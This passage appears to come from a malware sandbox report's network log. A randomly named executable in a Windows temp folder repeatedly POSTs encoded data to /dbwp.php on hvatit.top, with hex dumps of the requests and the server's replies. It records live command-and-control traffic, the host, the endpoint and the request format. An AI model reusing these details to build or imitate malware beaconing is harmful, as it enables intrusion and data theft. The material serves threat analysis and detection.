                                                        Aug 31, 2024 09:32:57.474776983 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        55192.168.2.44979280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:57.602408886 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:57.958698988 CEST2560OUTData Raw: 5a 54 59 57 5a 5e 50 53 5d 5f 54 57 54 5b 5b 57 5a 53 59 5b 52 50 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTYWZ^PS]_TWT[[WZSY[RPT_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&!"@=: W"=8]-<,7'*(36<&.1+3Y+$,!]'/Z,)
                                                        Aug 31, 2024 09:32:58.264861107 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:58.460954905 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        56192.168.2.44979380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:58.586018085 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:58.942951918 CEST2560OUTData Raw: 5f 58 59 56 5a 58 55 50 5d 5f 54 57 54 5a 5b 5c 5a 52 59 5d 52 53 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _XYVZXUP]_TWTZ[\ZRY]RSTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-0!(:#".?; (T&9($50[&U(3](? /?!]'/Z,-
                                                        Aug 31, 2024 09:32:59.275491953 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:59.464502096 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        57192.168.2.44979480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:59.589701891 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        58192.168.2.44979580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:59.620682001 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:00.011367083 CEST1436OUTData Raw: 5f 59 5c 54 5a 5d 50 56 5d 5f 54 57 54 59 5b 56 5a 50 59 58 52 50 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _Y\TZ]PV]_TWTY[VZPYXRPTSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.$1(9'#>8.,#Z ]$S&*7$543!(_?,8?!]'/Z,!
                                                        Aug 31, 2024 09:33:00.310025930 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:00.501486063 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 55 33 38 2e 1d 23 2b 31 0b 3e 02 32 0e 27 56 23 5a 38 31 29 07 2a 17 16 01 3e 3a 28 50 27 3d 02 5b 33 16 36 1f 32 01 06 1e 27 34 21 5b 07 10 22 12 31 00 3c 00 2c 02 22 58 26 30 00 02 21 21 26 5b 2a 3d 0b 1e 22 02 3d 19 30 5e 25 0b 3b 2a 31 0d 28 58 28 07 29 5e 3c 11 27 38 2b 50 00 12 26 19 26 01 28 1e 36 3d 2a 5a 21 5e 23 10 24 36 27 5f 34 3b 20 58 29 38 26 0d 25 3f 32 1c 20 30 22 01 25 1c 07 02 3c 3e 01 18 29 16 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #U38.#+1>2'V#Z81)*>:(P'=[362'4!["1<,"X&0!!&[*="=0^%;*1(X()^<'8+P&&(6=*Z!^#$6'_4; X)8&%?2 0"%<>)&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        59192.168.2.44979680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:59.748198032 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:00.100049973 CEST2560OUTData Raw: 5a 5d 5c 54 5a 55 50 5d 5d 5f 54 57 54 50 5b 50 5a 5c 59 58 52 5c 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z]\TZUP]]_TWTP[PZ\YXR\T_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-$"%(9?6>8_9?,7$U'(T$'$-%+(?]<Z#W./!]'/Z,
                                                        Aug 31, 2024 09:33:00.432357073 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:00.563625097 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        60192.168.2.44979780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:00.693032026 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:01.052381992 CEST2560OUTData Raw: 5a 58 5c 53 5f 5f 50 53 5d 5f 54 57 54 5c 5b 56 5a 55 59 5a 52 50 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZX\S__PS]_TWT\[VZUYZRPT^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&!1?9T!:<$7;U38W&&+Z$=<(+U.?!]'/Z,5
                                                        Aug 31, 2024 09:33:01.357017040 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:01.483724117 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        61192.168.2.44979880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:01.615559101 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:01.974189043 CEST2560OUTData Raw: 5a 54 59 57 5a 58 50 5c 5d 5f 54 57 54 59 5b 53 5a 5c 59 52 52 53 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTYWZXP\]_TWTY[SZ\YRRST\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.'!!()+#>9?7_"88T&*;0X')*+$+'W./!]'/Z,!
                                                        Aug 31, 2024 09:33:02.296930075 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:02.497220039 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        62192.168.2.44979980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:02.659742117 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:03.005532980 CEST2560OUTData Raw: 5f 5d 59 5f 5f 59 50 51 5d 5f 54 57 54 51 5b 52 5a 56 59 5c 52 55 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _]Y__YPQ]_TWTQ[RZVY\RUTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.\$2)+;!\-<3[ ;#39?0C?0S((,<+U/!]'/Z,
                                                        Aug 31, 2024 09:33:03.316628933 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:03.522239923 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        63192.168.2.44980080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:03.649830103 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:04.005518913 CEST2560OUTData Raw: 5a 5c 5c 51 5f 5f 50 5c 5d 5f 54 57 54 51 5b 55 5a 54 59 5e 52 56 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\\Q__P\]_TWTQ[UZTY^RVTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3!=)<U"-+,/+#$S');3%/_$[:W(+<48!]'/Z,
                                                        Aug 31, 2024 09:33:04.332037926 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:04.463614941 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        64192.168.2.44980180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:04.593728065 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:04.942981005 CEST2560OUTData Raw: 5a 5f 59 55 5a 5c 50 50 5d 5f 54 57 54 5a 5b 51 5a 57 59 5d 52 53 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z_YUZ\PP]_TWTZ[QZWY]RST]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.X315<9 T!. 9'_7+;3#''0[=+#<Z+/?!]'/Z,-
                                                        Aug 31, 2024 09:33:05.282617092 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:05.411982059 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        65192.168.2.44980280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:05.511956930 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        66192.168.2.44980380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:05.540561914 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:05.896106958 CEST2560OUTData Raw: 5f 58 59 51 5a 5c 55 55 5d 5f 54 57 54 5c 5b 54 5a 51 59 5e 52 53 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _XYQZ\UU]_TWT\[TZQY^RST\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3":=),T5,_:7#+(V'9;'%#^$-"U(+</;!]'/Z,5
                                                        Aug 31, 2024 09:33:06.233802080 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:06.369489908 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        67192.168.2.44980480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:06.490353107 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:06.849159002 CEST2560OUTData Raw: 5f 5f 59 54 5a 5e 55 55 5d 5f 54 57 54 5e 5b 54 5a 51 59 59 52 52 54 52 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __YTZ^UU]_TWT^[TZQYYRRTRQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'W:?:+!>(_97+U3:'$Z'>&U*;?/'W8!]'/Z,=
                                                        Aug 31, 2024 09:33:07.155083895 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:07.352502108 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        68192.168.2.44980580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:07.476170063 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:07.833610058 CEST2560OUTData Raw: 5a 5d 59 50 5a 5d 50 56 5d 5f 54 57 54 51 5b 56 5a 57 59 5b 52 56 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z]YPZ]PV]_TWTQ[VZWY[RVTSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'"6+R6=$.'[7+''+0%$0=>U(+(<#R;?!]'/Z,
                                                        Aug 31, 2024 09:33:08.318018913 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:08.318532944 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ
                                                        Aug 31, 2024 09:33:08.318726063 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        69192.168.2.44980680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:08.446336031 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:08.802340984 CEST2560OUTData Raw: 5a 5c 59 52 5a 5e 50 52 5d 5f 54 57 54 5a 5b 51 5a 52 59 5a 52 57 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\YRZ^PR]_TWTZ[QZRYZRWTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&1%=97">4]-/'X#(4S'\;$6($!++;=<;R,?!]'/Z,-
                                                        Aug 31, 2024 09:33:09.130804062 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:09.267637014 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        70192.168.2.44980780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:09.402483940 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
